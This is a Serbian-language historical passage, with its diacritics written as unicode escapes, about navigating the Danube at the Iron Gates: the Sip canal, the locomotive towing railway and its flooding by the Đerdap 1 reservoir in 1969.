Jo\u0161 u doba rimljana ovaj dao Dunava predstavljao je problem, tako da su rimljani prokopali prvi kanal gde su vodu Dunava izbili iz korita i naterali je da ide jazom, kojim su la\u0111e mogle bezbedno da plove. Mnogo, mnogo kasnije voda je prekinula te sip \u2013 ove i krenula da se ponovo lomi preko stena Gvozdenih vrata. Sipski kanal izra\u0111en je u periodu od 1890 \u2013 1896. Godine i bio je dug preko 2 kilometara. Ubrzo po otvaranju kanala uvidelo se kako je Dunav na ovom mestu i dalje mo\u0107an i velika prepreka za brodove. Grozni\u010davo je tra\u017eeno novo re\u0161enje koje su i na\u0161li 1899. godine uvo\u0111enjem parobrodske vu\u010de. I tako sve do 1916. kada su brodove zamenile tri lokomotive, manevarke, a Nemci na obalnom nasipu kanala sagradili prugu u du\u017eini od 1.800 metara. Ta mala pruga u\u0161la je u sve \u017eelezni\u010dke karte sveta. Tokom svog rada Sipska lokomotivska vu\u010da koristila je 11 lokomotiva. Oko plovidbe je sve bilo jednostavno, ali samo naizgled, bio je to te\u017eak posao i za ljude i za lokomotive. Trajalo je to decenijama sve dok 1969. godine izgradnjom prve \u0111erdapske elektrane nije stvoreno veliko akumulaciono jezero. Voda je, jednog jutra, u\u0161la u prostorije Sipske lokomotivske vu\u010de, skoro \u0161est meseci pre nego \u0161to su graditelji elektrane najavili i predvideli. Tako su pod vodom ostale kompletna pruga i dve nema\u010dke trocilindri\u010dne parne lokomotive, \u010duvene \u201eberlinke\u201d. Izgradnjom HE \u201e\u0110erdap 1\u201d sve se promenilo, ukrotili su Dunav, nije vi\u0161e predstavljao prepreku la\u0111arima, niti bio poguban za mnoge brodove u Malom kazanu \u010dije su o\u0161tre stene sa lako\u0107om parale njihovo dno. A, dok je bio mo\u0107an i brz iskusnim la\u0111arima se kosa dizala na glavi kad su morali da pro\u0111u najdubljim i naju\u017eim delom \u0110erdapske klisure. Zato je u Kladovu, Staroj Tekiji, Starom Sipu i drugim okolnim mestima naj\u010duvenije, ali i najpla\u0107enije zanimanje bilo ono po imenu \u2013 loc.
